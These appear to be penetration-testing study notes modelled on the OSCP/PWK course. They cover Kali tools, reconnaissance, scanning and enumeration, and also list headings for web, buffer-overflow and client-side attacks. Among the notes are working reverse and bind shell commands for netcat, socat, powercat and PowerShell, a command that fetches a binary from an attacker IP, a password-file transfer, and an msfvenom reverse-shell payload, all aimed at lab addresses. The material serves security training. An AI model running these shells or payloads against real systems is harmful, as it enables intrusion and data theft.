The use of kali

1. Searching, Installing, and Removing Tools
1.1 apt update
After the apt database has been updated, we can upgrade the installed packages and core system
to the latest versions using the apt upgrade command.
Search: apt-cache search application-name
1.2 apt install
The apt install command adds a package to the system.
1.3 apt remove --purge
The apt remove --purge command completely removes packages from Kali.
ex: sudo apt remove --purge pure-ftpd
1.4 dpkg
ex:sudo dpkg -i man-db_2.1.e.2-s_amd64.deb

2. Practical Tools
2.1 Netcat
2.1.1 Connecting to a TCP/UDP Port [client]
 Check whether a port is open or closed.
 Read a banner from the service listening on a port.
 Connect to a network service manually.
 ex: nc -nv 10.11.0.22 110
 -n: skip DNS name resolution
 -v: add some verbosity

2.1.2 Listening on a TCP/UDP Port [server]
 ex: nc -nlvp 4444
 -n: disable DNS name resolution
 -l: create a listener
 -v: add some verbosity
 -p: specify the listening port number

2.1.3 Transferring Files with Netcat
 On the Windows machine, we will set up a Netcat listener on port 4444 and redirect any output into a file called incoming.exe:
 C:\Users\offsec> nc -nlvp 4444 > incoming.exe
 On the Kali system, we will push the wget.exe file to the Windows machine through TCP port 4444:
 kali@kali:~$ locate wget.exe
 /usr/share/windows-resources/binaries/wget.exe
 kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
 The connection is received by Netcat on the Windows machine.
2.1.4 Reverse Shell Scenario
 C:\Users\offsec> nc -nlvp 4444    (Windows client)
 kali@kali:~$ nc -nv 10.11.0.22 4444 -e /bin/bash
 Windows listens on its port 4444 and Kali sends its bash to Windows port 4444; if this succeeds, commands typed on Windows are sent to Kali and executed there.

2.2 Socat
2.2.2 Socat File Transfers
 kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt    # serve the file on port 443
 C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create    # connect to the port and receive the file

2.2.3 Socat Reverse Shells
 C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
 kali@kali:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
 Kali sends its bash to the remote machine.

2.2.4 Socat Encrypted Bind Shells
 Use the openssl application to create a self-signed certificate with the following options:
 req: initiate a new certificate signing request
 -newkey: generate a new private key
 rsa:2048: use RSA encryption with a 2,048-bit key length
 -nodes: store the private key without passphrase protection
 -keyout: save the key to a file
 -x509: output a self-signed certificate instead of a certificate request
 -days: set the validity period in days
 -out: save the certificate to a file
 kali@kali:~$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
 Once we generate the key, we will cat the certificate and its private key into a file, which we will eventually use to encrypt our bind shell.
 kali@kali:~$ cat bind_shell.key bind_shell.crt > bind_shell.pem
 kali@kali:~$ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
 C:\Users\offsec> socat - OPENSSL:10.11.0.4:443,verify=0

2.3 PowerShell and Powercat
 PowerShell maintains an execution policy that determines which type of PowerShell scripts (if any)
 can be run on the system. The default policy is "Restricted", which effectively means the system
 will neither load PowerShell configuration files nor run PowerShell scripts. For the purposes of this
 module, we will need to set an "Unrestricted" execution policy on our Windows client machine. When presented with a User Account Control prompt, select Yes and
 enter Set-ExecutionPolicy Unrestricted:
 C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted
 C:\WINDOWS\system32> Get-ExecutionPolicy
2.3.1 PowerShell File Transfers
 C:\Users\offsec> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
2.3.2 PowerShell Reverse Shells
 C:\Users\offsec> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 kali@kali:~$ sudo nc -lnvp 443
2.3.4 Powercat
 Powercat is essentially the PowerShell version of Netcat, written by besimorhino. It is a script we
 can download to a Windows host to leverage the strengths of PowerShell, and it simplifies the
 creation of bind/reverse shells.
2.3.5 Powercat File Transfers
 kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
 C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
2.3.6 Powercat Reverse Shells
 kali@kali:~$ sudo nc -lvp 443
 C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
2.3.7 Powercat Bind Shells
 C:\Users\offsec> powercat -l -p 443 -e cmd.exe
 kali@kali:~$ nc 10.11.0.22 443
2.4 Wireshark
2.4.1 Wireshark Basics
 Wireshark uses Libpcap (on Linux) or Winpcap (on Windows) libraries in order to capture
 packets from the network.

2.5 Tcpdump

3. Bash Scripting


4. Passive Information Gathering
4.1 Taking Notes
 An information gathering campaign can generate a lot of data, and it's important that we manage
 that data well so that we can leverage it in further searches or use it in a later phase. There is no
 right or wrong way to take notes. However, we may find it easier to retrieve information later on if
 we keep detailed and well-formatted notes.
4.2 Website Recon
 If the client has a website, we can gather basic information by simply browsing the site.
4.3 Whois Enumeration
 Whois is a TCP service, tool, and a type of database that can provide information about a domain
 name, such as the name server and registrar. This information is often public since registrars
 charge a fee for private registration.
 kali@kali:~$ whois megacorpone.com
4.4 Google Hacking
 For example, to find interesting, non-HTML pages, we can use site:megacorpone.com to limit the
 search to megacorpone.com and subdomains, followed by -filetype:html to exclude HTML
 pages from the results:
4.5 Netcraft
4.6 Recon-ng (operated much like Metasploit)
 Recon-ng is a module-based framework for web-based information gathering. Recon-ng displays
 the results of a module to the terminal but it also stores them in a database. Much of the power of
 recon-ng lies in feeding the results of one module into another, allowing us to quickly expand the
 scope of our information gathering
 kali@kali:-$ recon-ng
 We can add modules from the recon-ng "Marketplace". We'll search the marketplace from the
 main prompt with marketplace search, providing a search string as an argument.
 In this example, we will search for modules that contain the term github:
 [recon-ng][default] > marketplace search github
 Use the google_site_web module to obtain hostnames for the domain, then the resolve module to obtain their IP addresses:
 [recon-ng][default] > modules load recon/domains-hosts/google_site_web
 [recon-ng][default][google_site_web] > options set SOURCE megacorpone.com
 [recon-ng][default][google_site_web] > run
 [recon-ng][default] > marketplace info recon/hosts-hosts/resolve
 [recon-ng][default] > marketplace install recon/hosts-hosts/resolve
 [recon-ng][default] > modules load recon/hosts-hosts/resolve
4.7 Open-Source Code
 In the following sections, we will discuss various online tools and resources that can be used to
 passively search for information. One such source of interesting information is open-source
 projects and online code repositories, such as GitHub, GitLab and SourceForge.
4.8 Shodan
 search for hostname:megacorpone.com
4.9 Security Headers Scanner
4.10 SSL Server Test
4.11 Pastebin
4.12 User Information Gathering
 4.12.1 Email Harvesting
 kali@kali:~$ theharvester -d megacorpone.com -b google
 We found some email addresses, one of which, first@megacorpone.com, appears to be new to
 us. We have also found some new subdomains of megacorpone.com. Let's add these to our notes
 as well.
 4.12.2 Password Dumps
4.13 Social Media Tools
4.13.1 Social-Searcher
4.13.2 Site-Specific Tools
4.15 Information Gathering Frameworks
4.15.1 OSINT Framework
4.15.2 Maltego
 Maltego searches thousands of online data sources, and uses extremely clever "transforms" to
 convert one piece of information into another. For example, if we are performing a user information
 gathering campaign, we could submit an email address, and through various automated searches,
 "transform" that into an associated phone number or street address. During an organizational
 information gathering exercise, we could submit a domain name and "transform" that into a web
 server, then a list of email addresses, then a list of associated social media accounts, and then into
 a potential password list for that email account.

5. Active Information Gathering
5.1 DNS Enumeration
5.1.1 Interacting with a DNS Server
 Each domain can use different types of DNS records. Some of the most common types of DNS
 records include:
 NS - Nameserver records contain the name of the authoritative servers hosting the DNS
 records for a domain.
 A - Also known as a host record, the "A record" contains the IP address of a hostname (such
 as www.megacorpone.com).
 MX - Mail Exchange records contain the names of the servers responsible for handling email
 for the domain. A domain can contain multiple MX records.
 PTR - Pointer Records are used in reverse lookup zones and are used to find the records
 associated with an IP address.
 CNAME - Canonical Name Records are used to create aliases for other host records.
 TXT - Text records can contain any arbitrary data and can be used for various purposes,
 such as domain ownership verification.
 To demonstrate this, we'll use the host command to find the IP address of
 www.megacorpone.com:
 kali@kali:~$ host www.megacorpone.com
 kali@kali:~$ host -t mx megacorpone.com
 kali@kali:~$ host -t txt megacorpone.com    (the domain's TXT records)
5.1.2 Automating Lookups
 kali@kali:~$ for ip in $(cat list.txt); do host $ip.megacorpone.com; done
5.1.3 Reverse Lookup Brute Force (gathering information through reverse resolution)
 for ip in $(seq 50 100); do host 38.100.193.$ip; done | grep -v "not found"
5.1.5 DNS Zone Transfers
 A zone transfer is basically a database replication between related DNS servers in which the zone
 file is copied from a master DNS server to a slave server. The zone file contains a list of all the DNS
 names configured for that zone. Zone transfers should only be allowed to authorized slave DNS
 servers but many administrators misconfigure their DNS servers, and in these cases, anyone asking
 for a copy of the DNS server zone will usually receive one.
 The host command syntax for performing a zone transfer is as follows:
 host -l <domain name> <dns server address>
 kali@kali:~$ host -l megacorpone.com ns2.megacorpone.com
5.1.6 Relevant Tools in Kali Linux
5.1.6.1 DNSRecon
 DNSRecon is an advanced, modern DNS enumeration script written in Python. Running
 dnsrecon against megacorpone.com using the -d option to specify a domain name, and -t to
 specify the type of enumeration to perform (in this case a zone transfer), produces the following
 output:
 kali@kali:-$ dnsrecon -d megacorpone.com -t axfr
5.1.6.2 DNSenum
 kali@kali:~$ dnsenum zonetransfer.me
5.2 Port Scanning
 Port scanning is the process of inspecting TCP or UDP ports on a remote machine with the intention
 of detecting what services are running on the target and what potential attack vectors may exist.
5.2.1 TCP / UDP Scanning
5.2.1.1 TCP Scanning
 To illustrate this, we will run a TCP Netcat port scan on ports 3388-3390. The -w option specifies
 the connection timeout in seconds and -z is used to specify zero-I/O mode, which will send no data
 and is used for scanning:
 kali@kali:~$ nc -nvv -w 1 -z 10.11.1.220 3388-3390
5.2.1.2 UDP Scanning
 Let's run a UDP Netcat port scan against ports 160-162 on a different target. This is done using the
 only nc option we have not seen yet, -u, which indicates a UDP scan:
 kali@kali:~$ nc -nv -u -z -w 1 10.11.1.115 160-162
 If the destination UDP port is closed, the target should respond with an ICMP port unreachable message.
5.2.2 Port Scanning with Nmap
 A default Nmap TCP scan will scan the 1000 most popular ports on a given machine.
 kali@kali:~$ nmap -p 1-65535 10.11.1.220
 A similar local port scan explicitly probing all 65535 ports generated about 4 MB of traffic.
5.2.2.2 Stealth / SYN Scanning
 kali@kali:~$ sudo nmap -sS 10.11.1.220
 Because the three-way handshake is never completed, the information is not passed to the
 application layer and as a result, will not appear in any application logs. A SYN scan is also faster
 and more efficient because fewer packets are sent and received.
5.2.2.3 TCP Connect Scanning
 There might be times when we need to specifically perform a connect scan with nmap, for example,
 when scanning via certain types of proxies. We use the -sT option to start a connect scan:
 kali@kali:~$ nmap -sT 10.11.1.220
5.2.2.4 UDP Scanning
 When performing a UDP scan, Nmap will use a combination of two different methods to
 determine if a port is open or closed. For most ports, it will use the standard "ICMP port
 unreachable" method described earlier by sending an empty packet to a given port. However, for
 common ports, such as port 161, which is used by SNMP, it will send a protocol-specific SNMP
 packet in an attempt to get a response from an application bound to that port. To perform a UDP
 scan, the -sU option is used and sudo is required to access raw sockets:
 kali@kali:~$ sudo nmap -sU 10.11.1.115
 The UDP scan (-sU) can also be used in conjunction with the TCP SYN scan (-sS) option to build a
 more complete picture of our target:
 kali@kali:~$ sudo nmap -sS -sU 10.11.1.115
5.2.2.5 Network Sweeping
 To deal with large volumes of hosts, or to otherwise try to conserve network traffic, we can attempt
 to probe targets using Network Sweeping techniques
 kali@kali:~$ nmap -sn 10.11.1.1-254
 Searching for live machines using the grep command on standard nmap output can be
 cumbersome. Instead, let's use Nmap's "greppable" output parameter, -oG, to save these results
 into a format that is easier to manage:
 kali@kali:~$ nmap -v -sn 10.11.1.1-254 -oG ping-sweep.txt
 kali@kali:~$ grep Up ping-sweep.txt | cut -d " " -f 2
 To save time and network resources, we can also scan multiple IPs, probing for a short list of
 common ports. For example, let's conduct a TCP connect scan for the top twenty TCP ports with
 the --top-ports option and enable OS version detection, script scanning, and traceroute with -A:
 kali@kali:~$ nmap -sT -A --top-ports=20 10.11.1.1-254 -oG top-port-sweep.txt
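As an added example (not from the course notes or from Nmap itself), the following Python parser reads the -oG files written by the two commands above and returns live hosts and open ports, replacing the grep/cut pipeline; the scan lines embedded in it are constructed sample data, not a real sweep.

```python
"""Parse Nmap greppable (-oG) output into live hosts and their open ports."""
import re
from dataclasses import dataclass, field

# Constructed sample of -oG output (not real scan data). Fields are tab separated;
# one host can appear twice: a "Status:" line from the sweep and a "Ports:" line.
SAMPLE_OG = """\
# Nmap 7.91 scan initiated Sat Jan  1 12:00:00 2022 as: nmap -v -sn 10.11.1.1-254 -oG ping-sweep.txt
Host: 10.11.1.1 ()\tStatus: Up
Host: 10.11.1.2 ()\tStatus: Down
Host: 10.11.1.5 (web01.example.test)\tStatus: Up
Host: 10.11.1.5 (web01.example.test)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.38 ((Debian))/, 443/closed/tcp//https///\tIgnored State: filtered (17)
Host: 10.11.1.220 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (18)
# Nmap done at Sat Jan  1 12:01:00 2022 -- 254 IP addresses (3 hosts up) scanned in 60.00 seconds
"""


@dataclass
class Port:
    number: int
    protocol: str   # tcp or udp
    state: str      # open, closed, filtered, ...
    service: str
    version: str


@dataclass
class Host:
    ip: str
    hostname: str
    status: str = "unknown"
    ports: list = field(default_factory=list)


HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
# Port entries are separated by ", "; split only where the next entry begins
# with "<number>/" so that commas inside version strings do not break parsing.
PORT_SPLIT_RE = re.compile(r",\s+(?=\d+/)")


def parse_port_entry(entry):
    """Parse one 'port/state/proto/owner/service/rpcinfo/version/' entry."""
    parts = entry.split("/")
    if len(parts) < 7:
        raise ValueError(f"malformed port entry: {entry!r}")
    # The trailing slash leaves an empty last element; keep any slashes in the version text.
    version = "/".join(parts[6:-1]) if len(parts) > 7 else parts[6]
    return Port(int(parts[0]), parts[2], parts[1], parts[4], version)


def parse_greppable(text):
    """Return {ip: Host}, merging the Status and Ports lines of each host."""
    hosts = {}
    for line in text.splitlines():
        match = HOST_RE.match(line)
        if not match:
            continue  # "# Nmap ..." header and footer lines
        ip, hostname = match.groups()
        host = hosts.setdefault(ip, Host(ip, hostname))
        for fld in line.split("\t")[1:]:
            key, _, value = fld.partition(":")
            value = value.strip()
            if key == "Status":
                host.status = value
            elif key == "Ports":
                host.ports.extend(parse_port_entry(e) for e in PORT_SPLIT_RE.split(value))
    return hosts


def _ip_key(ip):
    return tuple(int(octet) for octet in ip.split("."))


def live_hosts(hosts):
    """Equivalent of `grep Up ping-sweep.txt | cut -d " " -f 2`, plus hosts with an open port."""
    return sorted((h.ip for h in hosts.values()
                   if h.status == "Up" or any(p.state == "open" for p in h.ports)), key=_ip_key)


def open_ports(hosts, ip):
    """(port, protocol, service) tuples for every open port seen on one host."""
    return [(p.number, p.protocol, p.service) for p in hosts[ip].ports if p.state == "open"]


def hosts_with_port(hosts, number, protocol="tcp"):
    """Hosts exposing a given open port, e.g. 445/tcp as input to the SMB enumeration step."""
    return sorted((ip for ip, h in hosts.items()
                   if any(p.number == number and p.protocol == protocol and p.state == "open"
                          for p in h.ports)), key=_ip_key)


if __name__ == "__main__":
    scan = parse_greppable(SAMPLE_OG)
    for ip in live_hosts(scan):
        print(ip, scan[ip].hostname or "-", open_ports(scan, ip))
```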
5.2.2.6 OS Fingerprinting
 kali@kali:~$ sudo nmap -O 10.11.1.220
5.2.2.7 Banner Grabbing/Service Enumeration
 Inspecting service banners (-sV) and
 running various OS and service enumeration scripts (-A) against the target:
 kali@kali:~$ nmap -sV -sT -A 10.11.1.220
5.2.2.8 Nmap Scripting Engine (NSE)
 We can use the Nmap Scripting Engine (NSE) to launch user-created scripts in order to automate
 various scanning tasks. These scripts perform a broad range of functions including DNS
 enumeration, brute force attacks, and even vulnerability identification. NSE scripts are located in
 the /usr/share/nmap/scripts directory.
 kali@kali:~$ nmap 10.11.1.220 --script=smb-os-discovery
 Another useful (and self-explanatory) NSE script is dns-zone-transfer:
 kali@kali:~$ nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
 To view more information about a script we can use the --script-help option:
 kali@kali:~$ nmap --script-help dns-zone-transfer
5.2.3 Masscan
 Masscan is arguably the fastest port scanner; it can scan the entire Internet in about 6 minutes,
 transmitting an astounding 10 million packets per second! While it was originally designed to scan
 the entire Internet, it can easily handle a class A or B subnet, which is a more suitable target range
 during a penetration test.
 kali@kali:~$ sudo apt install masscan
 Important: This command is NOT to be tried in the PWK internal lab network, as you would be scanning subnets you are not allowed to.
 kali@kali:~$ sudo masscan -p80 10.0.0.0/8
 To try masscan on a class C subnet in the PWK internal lab network, we can use the following
 example. We will add a few additional masscan options, including --rate to specify the desired
 rate of packet transmission, -e to specify the raw network interface to use, and --router-ip to
 specify the IP address for the appropriate gateway:
 kali@kali:~$ sudo masscan -p80 10.11.1.0/24 --rate=1000 -e tap0 --router-ip 10.11.0.1
5.3 SMB Enumeration
5.3.1 Scanning for the NetBIOS Service
 kali@kali:~$ nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
 kali@kali:~$ sudo nbtscan -r 10.11.1.0/24
5.3.2 Nmap SMB NSE Scripts
 kali@kali:~$ ls -l /usr/share/nmap/scripts/smb*
 kali@kali:~$ nmap -v -p 139,445 --script=smb-os-discovery 10.11.1.227
 kali@kali:~$ nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.5
5.4 NFS Enumeration
5.4.1 Scanning for NFS Shares
 Both Portmapper and RPCbind run on TCP port 111. RPCbind maps RPC services to the ports
 on which they listen.
 kali@kali:~$ nmap -v -p 111 10.11.1.1-254
 We can use NSE scripts like rpcinfo to find services that may have registered with rpcbind:
 kali@kali:~$ nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
5.4.2 Nmap NFS NSE Scripts
 kali@kali:~$ ls -l /usr/share/nmap/scripts/nfs*
 kali@kali:~$ nmap -p 111 --script nfs* 10.11.1.72
5.5 SMTP Enumeration
 kali@kali:~$ nc -nv 10.11.1.217 25
5.6 SNMP Enumeration
5.6.1 The SNMP Mib Tree
 The SNMP Management Information Base (MIB) is a database containing information usually
 related to network management. The database is organized like a tree, where branches represent
 different organizations or network functions. The leaves of the tree (final endpoints) correspond to
 specific variable values that can then be accessed, and probed, by an external user. The IBM
 Knowledge Center contains a wealth of information about the MIB tree.
5.6.2 Scanning for SNMP
 To scan for open SNMP ports, we can run nmap as shown in the example that follows. The -sU
 option is used to perform UDP scanning and the --open option is used to limit the output to only
 display open ports:
 kali@kali:~$ sudo nmap -sU --open -p 161 10.11.1.1-254 -oG open-snmp.txt
 Alternatively, we can use a tool such as onesixtyone, which will attempt a brute force attack
 against a list of IP addresses. First we must build text files containing community strings and the
 IP addresses we wish to scan:
 kali@kali:~$ echo public > community
 kali@kali:~$ echo private >> community
 kali@kali:~$ echo manager >> community
 kali@kali:~$ for ip in $(seq 1 254); do echo 10.11.1.$ip; done > ips
 kali@kali:~$ onesixtyone -c community -i ips
 Once we find SNMP services, we can start querying them for specific MIB data that might be
 interesting.
5.6.3 Windows SNMP Enumeration Example
5.6.3.1 Enumerating the Entire MIB Tree
 Using some of the MIB values provided in Listing 268, we can attempt to enumerate their
 corresponding values. Try out the following examples against a known machine in the labs, which
 has a Windows SNMP port exposed with the community string "public". This command
 enumerates the entire MIB tree using the -c option to specify the community string, and -v to
 specify the SNMP version number as well as the -t 10 to increase the timeout period to 10
 seconds:
 kali@kali:~$ snmpwalk -c public -v1 -t 10 10.11.1.14
5.6.3.2 Enumerating Windows Users
 kali@kali:~$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25
5.6.3.3 Enumerating Running Windows Processes
 kali@kali:~$ snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2
5.6.3.4 Enumerating Open TCP Ports
 kali@kali:~$ snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2

8. Vulnerability Scanning
8.1 How Vulnerability Scanners Work
 1. Detect if a target is up and running.
 2. Conduct a full or partial port scan, depending on the configuration.
 3. Identify the operating system using common fingerprinting techniques.
 4. Attempt to identify running services with common techniques such as banner grabbing,
 service behavior identification, or file discovery.
 5. Execute a signature-matching process to discover vulnerabilities.
8.2 Vulnerability Scanning with Nessus
8.2.1 Installing Nessus
 kali@kali:~$ sudo apt update && sudo apt upgrade
 kali@kali:~/nessus$ sha256sum Nessus-X.X.X.deb
 kali@kali:~/nessus$ sudo apt install ./Nessus-X.X.X.deb
 kali@kali:~/nessus$ sudo /etc/init.d/nessusd start
8.2.2 Defining Targets
 Nessus supports a number of scan types, including:
 Basic Network Scan: Generic scan with various checks that are suitable to be used against
 various target types.
 Credentialed Patch Audit: Authenticated scan that enumerates missing patches.
 Web Application Tests: Specialized scan for discovering published vulnerabilities in Web
 Applications.
 Spectre and Meltdown: Targeted scan for the Spectre and Meltdown vulnerabilities.
8.2.3 Configuring Scan Definitions
 Some things to consider when configuring the Basic Network Scan template include:
 1. Are our targets located on an internal network or are they publicly accessible?
 2. Should the scanner attempt to brute force user credentials?
 3. Should the scanner scan all TCP and UDP ports or only common ports?
 4. Which checks should the scanner run and which ones should it avoid?
 5. Should the scanner run an Authenticated Scan or an Unauthenticated Scan?
8.2.4 Unauthenticated Scanning With Nessus
8.2.5 Authenticated Scanning With Nessus
8.2.6 Scanning with Individual Nessus Plugins
8.3 Vulnerability Scanning with Nmap
As an alternative to Nessus, we can also use the Nmap Scripting Engine (NSE) to perform
automated vulnerability scans.
We can use the NSE to detect a vulnerability. For this example, we will use --script vuln to
run all scripts in the "vuln" category against a target in the PWK labs:
kali@kali:~$ sudo nmap --script vuln 10.11.1.10

9. Web Application Attacks
9.3 Web Application Assessment Tools
9.3.2 DIRB
DIRB is a web content scanner that uses a wordlist to find directories and pages by issuing
requests to the server. DIRB can identify valid web pages on a web server even if the main index
page is missing.
Let's run DIRB on www.megacorpone.com. We will supply several arguments: the URL to scan, -r
to scan non-recursively, and -z 10 to add a 10 millisecond delay to each request:
kali@kali:~$ dirb http://www.megacorpone.com -r -z 10
9.3.3 Burp Suite
Burp Suite is a GUI-based collection of tools geared towards web application security testing,
arguably best-known as a powerful proxy tool. While the free Community Edition mainly contains
tools used in manual testing, the commercial versions include additional features, including a
formidable web application vulnerability scanner. Burp Suite has an extensive feature list and is
worth investigation, but we will only explore a few basic functions in this section. Please note that
while Burp Suite Professional is prohibited during the OSCP exam, it is also not necessary.
9.3.4 Nikto
Nikto is a highly configurable Open Source web server scanner that tests for thousands of
dangerous files and programs, vulnerable server versions and various server configuration issues.
It performs well, but is not designed for stealth as it will send many requests and embed information
about itself in the User-Agent header.
kali@kali:~$ nikto -host=http://www.megacorpone.com -maxtime=30s

9.4 Exploiting Web-based Vulnerabilities
9.4.1 Exploiting Admin Consoles
Once we've located an admin console, the simplest "exploit" is to just log into it. We may attempt default username/password
pairs, use enumerated information to guess working credentials, or attempt brute force.
9.4.1.2 Burp Suite Intruder

9.4.2 Cross-Site Scripting (XSS)
9.4.2.1 Identifying XSS Vulnerabilities
9.4.2.2 Basic XSS
9.4.2.3 Content Injection
9.4.2.4 Stealing Cookies and Session Information
9.4.2.6 Other XSS Attack Vectors

9.4.3 Directory Traversal Vulnerabilities
9.4.3.1 Identifying and Exploiting Directory Traversals

9.4.4 File Inclusion Vulnerabilities
9.4.4.1 Identifying File Inclusion Vulnerabilities
9.4.4.2 Exploiting Local File Inclusion (LFI)
9.4.4.3 Contaminating Log Files
9.4.4.4 LFI Code Execution
9.4.4.6 Remote File Inclusion (RFI)
9.4.4.9 PHP Wrappers

9.4.5 SQL Injection
9.4.5.1 Basic SQL Syntax
9.4.5.2 Identifying SQL Injection Vulnerabilities
9.4.5.3 Authentication Bypass
9.4.5.5 Enumerating the Database
9.4.5.6 Column Number Enumeration
9.4.5.7 Understanding the Layout of the Output
9.4.5.8 Extracting Data from the Database
9.4.5.10 From SQL Injection to Code Execution
9.4.5.12 Automating SQL Injection(sqlmap)

10. Introduction to Buffer Overflows
10.1 Introduction to the x86 Architecture
To understand how memory corruptions occur and how they can be leveraged into unauthorized access, we need to discuss program memory, understand how software works at the CPU level, and outline a few basic definitions.
10.1.1 Program Memory
10.1.1.1 The Stack
10.1.1.2 Function Return Mechanics
10.1.2 CPU Registers
10.1.2.1 General Purpose Registers
10.1.2.2 ESP - The Stack Pointer
10.1.2.3 EBP - The Base Pointer
10.1.2.4 EIP - The Instruction Pointer

10.2 Buffer Overflow Walkthrough
10.2.1 Sample Vulnerable Code
10.2.2 Introducing the Immunity Debugger
10.2.3 Navigating Code
10.2.4 Overflowing the Buffer

11. Windows Buffer Overflows
11.1 Discovering the Vulnerability
11.1.1 Fuzzing the HTTP Protocol
11.2 Win32 Buffer Overflow Exploitation
11.2.1 A Word About DEP, ASLR, and CFG
11.2.2 Replicating the Crash
11.2.3 Controlling EIP
11.2.4 Locating Space for Our Shellcode
11.2.5 Checking for Bad Characters
11.2.6 Redirecting the Execution Flow
11.2.7 Finding a Return Address
11.2.8 Generating Shellcode with Metasploit
kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -f c
11.2.9 Getting a Shell

12. Linux Buffer Overflows
12.1 About DEP, ASLR, and Canaries
12.2 Replicating the Crash
12.3 Controlling EIP
12.4 Locating Space for Our Shellcode
12.5 Checking for Bad Characters
12.6 Finding a Return Address
12.7 Getting a Shell

13. Client-Side Attacks
13.1 Know Your Target
13.1.1 Passive Client Information Gathering
13.1.2 Active Client Information Gathering
13.1.2.1 Social Engineering and Client-Side Attacks
13.1.2.2 Client Fingerprinting
13.2 Leveraging HTML Applications
13.2.1 Exploring HTML Applications
13.2.2 HTA Attack in Action
13.3 Exploiting Microsoft Office
13.3.2 Microsoft Word Macro
The Microsoft Word macro may be one the oldest and best-known client-side software attack vectors.
13.3.3 Object Linking and Embedding
13.3.4 Evading Protected View

14. Locating Public Exploits
In this module, we will focus on various online resources that host exploits for publicly known vulnerabilities.
14.1 A Word of Caution
14.2 Searching for Exploits
14.2.1 Online Exploit Resources
14.2.1.1 The Exploit Database
14.2.1.2 Security Focus Exploit Archives
14.2.1.3 Packet Storm
14.2.1.4 Google Search Operators

14.2.2 Offline Exploit Resources
14.2.2.1 SearchSploit
kali@kali:~$ sudo apt update && sudo apt install exploitdb
kali@kali:~$ searchsploit
kali@kali:~$ searchsploit remote smb microsoft windows
14.2.2.2 Nmap NSE Scripts
kali@kali:~$ cd /usr/share/nmap/scripts
kali@kali:/usr/share/nmap/scripts$ grep Exploits *.nse
14.2.2.3 The Browser Exploitation Framework (BeEF)
14.2.2.4 The Metasploit Framework
Metasploit is an excellent framework built to assist in the development and execution of exploits. This framework is available in Kali Linux by default and can be started with the msfconsole command:
kali@kali:~$ sudo msfconsole -q

15. Fixing Exploits
Writing an exploit from scratch can be difficult and time-consuming. But it can be equally difficult and time-consuming to find a public exploit that fits our exact needs during an engagement. One great compromise is to modify a public exploit to suit our specific needs.
15.1 Fixing Memory Corruption Exploits
15.1.1 Overview and Considerations
The general flow of a standard stack overflow (in applications running in user mode without mitigations such as DEP and ASLR) is fairly straightforward. The exploit will:
 1. Create a large buffer to trigger the overflow.
 2. Take control of EIP by overwriting a return address on the stack by padding the large buffer with an appropriate offset.
 3. Include a chosen payload in the buffer prepended by an optional NOP sled.
 4. Choose a correct return address instruction such as JMP ESP (or a different register) in order to redirect the execution flow into our payload.
15.1.2 Importing and Examining the Exploit
15.1.3 Cross-Compiling Exploit Code
15.1.4 Changing the Socket Information
15.1.5 Changing the Return Address
15.1.6 Changing the Payload
15.1.7 Changing the Overflow Buffer

15.2 Fixing Web Exploits
When modifying web exploits, there are several key questions we generally need to ask while approaching the code:
Does it initiate an HTTP or HTTPS connection?
Does it access a web application specific path or route?
Does the exploit leverage a pre-authentication vulnerability?
If not, how does the exploit authenticate to the web application?
How are the GET or POST requests crafted to trigger and exploit the vulnerability?
Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
Will oddities such as self-signed certificates disrupt the exploit?
15.2.2 Selecting the Vulnerability
15.2.3 Changing Connectivity Information
15.2.4 Troubleshooting the "index out of range" Error

16. File Transfers
16.1 Considerations and Preparations
16.1.1 Dangers of Transferring Attack Tools
In some cases, we may need to transfer attack tools and utilities to our target. However,
transferring these tools can be dangerous for several reasons.
First, our post-exploitation attack tools could be abused by malicious parties, which puts the client's resources at risk. It is extremely important to document uploads and remove them after the assessment is completed.
Second, antivirus software, which scans endpoint filesystems in search of pre-defined file signatures, becomes a huge frustration for us during this phase. This software, which is ubiquitous in most corporate environments, will detect our attack tools, quarantine them (rendering them useless), and alert a system administrator.
16.1.2 Installing Pure-FTPd
kali@kali:~$ sudo apt update && sudo apt install pure-ftpd
16.1.3 The Non-Interactive Shell
We are not receiving any feedback in our shell.
Most Netcat-like tools provide a non-interactive shell, which means that programs that require user input, such as many file transfer programs or su and sudo, tend to work poorly, if at all. Non-interactive shells also lack useful features like tab completion and job control.
16.1.3.7 Upgrading a Non-Interactive Shell
16.2 Transferring Files with Windows Hosts
